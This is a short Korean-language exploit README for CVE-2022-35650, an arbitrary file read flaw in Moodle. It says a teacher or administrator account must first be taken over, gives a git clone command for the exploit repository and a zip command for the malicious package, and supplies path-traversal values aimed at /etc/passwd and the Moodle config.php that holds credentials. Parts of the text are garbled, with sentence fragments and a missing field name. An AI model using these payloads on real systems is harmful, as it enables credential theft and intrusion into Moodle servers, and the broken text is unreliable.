
CVE-2022-35650 익스플로잇, Moodle 임의 파일 읽기.
이것은 Moodle에서의 임의 파일 읽기 취약점입니다.
교사 또는 관리자 수준 사용자의 계정을 탈취해야 합니다.
git clone https://github.com/Gr4y-r0se/CVE-2022-35650.git
zip exploit.zip imsmanifest.xml pool.dat
__passwd) 파일이 다운로드되는 것을 확인하세요./etc/passwd의 내용입니다.설정 파일(중요한 자격 증명 포함)을 읽으려면 imsmanifest.xml의 을 다음과 같이 설정하세요:
baseurl../../../../../../../../../../../var/www/html
그리고 pool.dat의 img src를 다음과 같이 설정하세요:
muc/config.php